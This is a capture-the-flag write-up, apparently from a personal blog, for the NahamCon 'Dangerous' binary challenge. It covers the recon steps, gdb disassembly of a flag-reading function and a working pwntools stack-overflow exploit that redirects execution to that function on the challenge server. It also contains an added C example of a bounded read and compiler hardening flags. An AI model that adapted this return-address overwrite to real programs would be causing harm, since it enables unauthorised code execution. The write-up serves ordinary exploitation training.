kanyewest CTF

Notes on things I have been studying.

NahamCon CTF [Write-up]

Dangerous

$ file dangerous 
dangerous: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=2b7e7edf071a5dd08228a996ed76400783fba08c, for GNU/Linux 3.2.0, stripped
$ checksec.sh --file=./dangerous 
RELRO           STACK CANARY      NX            PIE             RPATH      RUNPATH      Symbols         FORTIFYFortified        Fortifiable  FILE
Partial RELRO   No canary found   NX enabled    No PIE          No RPATH   No RUNPATH   No Symbols      No     01       ./dangerous

First of all, we can see that a buffer overflow (BOF) is on the table: no stack canary and no PIE.

$ ./dangerous 
What's your name?
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA^M
It's dangerous to go alone! Take this, AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
         █   
        ███  
        ███  
        ███  
        ███  
        ███  
        ███  
        ███  
        ███  
        ███  
      ███████
      █ ███ █
        ███  
        ███  
        ███  

Segmentation fault (コアダンプ)
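The crash above comes from the name being read into a fixed-size stack buffer with no length bound. The following is an added example, not the challenge's source (which is not shown): the bounded form of that read, with a pipe-fed check that an oversize name is cut off instead of spilling past the buffer.

```c
#include <stdio.h>
#include <string.h>
#include <unistd.h>

/* Added example, not the challenge's source (which is not shown): the bug
 * class is a read() of the name into a fixed stack buffer with no length
 * bound, so surplus bytes reach the saved return address. This is the
 * bounded form of that read. */
#define NAME_CAP 256

/* Reads at most cap-1 bytes from fd, strips one trailing newline and always
 * NUL-terminates. Returns the stored length or -1 on error; surplus input
 * stays unread in fd instead of spilling past the buffer. */
ssize_t read_name(int fd, char *name, size_t cap)
{
    if (cap == 0)
        return -1;
    ssize_t n = read(fd, name, cap - 1);
    if (n < 0)
        return -1;
    name[n] = '\0';
    if (n > 0 && name[n - 1] == '\n')
        name[--n] = '\0';
    return n;
}

/* snprintf truncates rather than overflowing the output buffer. */
int greet(const char *name, char *out, size_t outcap)
{
    return snprintf(out, outcap, "It's dangerous to go alone! Take this, %s", name);
}

/* Pushes a constructed 600-byte name through a pipe (the write-up's input was
 * about that long) and returns how much read_name stored: 255, never more. */
ssize_t demo_overlong(void)
{
    int fds[2];
    char filler[600], name[NAME_CAP];
    if (pipe(fds) != 0)
        return -1;
    memset(filler, 'A', sizeof filler);
    if (write(fds[1], filler, sizeof filler) != (ssize_t)sizeof filler)
        return -1;
    close(fds[1]);
    ssize_t n = read_name(fds[0], name, sizeof name);
    close(fds[0]);
    return n;
}
```

Building with -fstack-protector-strong and -fPIE -pie would also supply the canary and PIE that checksec reported missing, so a corrupted return address is detected before the ret and the flag function no longer sits at a fixed address.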
$ readelf -r ./dangerous 

再配置セクション '.rela.dyn' at offset 0x550 contains 3 entries:
  オフセット      情報           型             シンボル値    シンボル名 + 加数
000000403ff0  000500000006 R_X86_64_GLOB_DAT 0000000000000000 __libc_start_main@GLIBC_2.2.5 + 0
000000403ff8  000600000006 R_X86_64_GLOB_DAT 0000000000000000 __gmon_start__ + 0
000000404060  000900000005 R_X86_64_COPY     0000000000404060 stdout@GLIBC_2.2.5 + 0

再配置セクション '.rela.plt' at offset 0x598 contains 6 entries:
  オフセット      情報           型             シンボル値    シンボル名 + 加数
000000404018  000100000007 R_X86_64_JUMP_SLO 0000000000000000 puts@GLIBC_2.2.5 + 0
000000404020  000200000007 R_X86_64_JUMP_SLO 0000000000000000 strlen@GLIBC_2.2.5 + 0
000000404028  000300000007 R_X86_64_JUMP_SLO 0000000000000000 close@GLIBC_2.2.5 + 0
000000404030  000400000007 R_X86_64_JUMP_SLO 0000000000000000 read@GLIBC_2.2.5 + 0
000000404038  000700000007 R_X86_64_JUMP_SLO 0000000000000000 setvbuf@GLIBC_2.2.5 + 0
000000404040  000800000007 R_X86_64_JUMP_SLO 0000000000000000 open@GLIBC_2.2.5 + 0

Since open is imported, we can infer that there is a function that opens flag.txt. Checking with the strings command as well confirms that the string flag.txt is present.

$ strings ./dangerous

(omitted)

What's your name?
Uh-oh... something's not right... good luck...
./flag.txt
:*3$"
GCC: (Ubuntu 9.2.1-9ubuntu2) 9.2.1 20191008
.shstrtab
.interp
.note.gnu.property
.note.gnu.build-id
.note.ABI-tag
.gnu.hash
.dynsym
.dynstr
.gnu.version
.gnu.version_r
.rela.dyn
.rela.plt
.init
.plt.sec
.text
.fini
.rodata
.eh_frame_hdr
.eh_frame
.init_array
.fini_array
.dynamic

All that remains is to find the address of the function that opens flag.txt and jump to it via the BOF.

Reading through the code from the entry point in gdb,

gdb-peda$
   0x401312:    push   rbp
   0x401313:    mov    rbp,rsp
   0x401316:    sub    rsp,0x210
   0x40131d:    mov    esi,0x0
   0x401322:    lea    rdi,[rip+0xf16]        # 0x40223f
   0x401329:    mov    eax,0x0
   0x40132e:    call   0x4010e0 <open@plt>
   0x401333:    mov    DWORD PTR [rbp-0x4],eax
   0x401336:    lea    rcx,[rbp-0x210]
   0x40133d:    mov    eax,DWORD PTR [rbp-0x4]
gdb-peda$ 
   0x401340:    mov    edx,0x200
   0x401345:    mov    rsi,rcx
   0x401348:    mov    edi,eax
   0x40134a:    call   0x4010c0 <read@plt>
   0x40134f:    mov    eax,DWORD PTR [rbp-0x4]
   0x401352:    mov    edi,eax
   0x401354:    call   0x4010b0 <close@plt>
   0x401359:    lea    rax,[rbp-0x210]
   0x401360:    mov    rdi,rax
   0x401363:    call   0x401090 <puts@plt>
gdb-peda$ 
   0x401368:    nop
   0x401369:    leave  
   0x40136a:    ret  

This looks like the function we want: it open()s the string at 0x40223f (./flag.txt), read()s 0x200 bytes of it into a stack buffer, and puts() the result.

The exploit code is as follows.

from pwn import *

e = ELF('./dangerous')
#p = process('./dangerous')
p = remote('jh2i.com',50011)

flag = 0x401312        # function found above: open("./flag.txt"), read, puts
ret_addr = 0x0040101a  # lone 'ret' gadget: consumes 8 bytes so rsp is 16-byte aligned on entry to flag

payload = b'A'*497     # bytes, so this also runs under Python 3 pwntools
payload += p64(ret_addr)
payload += p64(flag)

p.sendline(payload)
p.interactive()

$ python solve.py 
[*]
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
[+] Opening connection to jh2i.com on port 50011: Done
[*] Switching to interactive mode
What's your name?
It's dangerous to go alone! Take this, AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
         █   
        ███  
        ███  
        ███  
        ███  
        ███  
        ███  
        ███  
        ███  
        ███  
      ███████
      █ ███ █
        ███  
        ███  
        ███  

flag{legend_of_zelda_overflow_of_time}
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA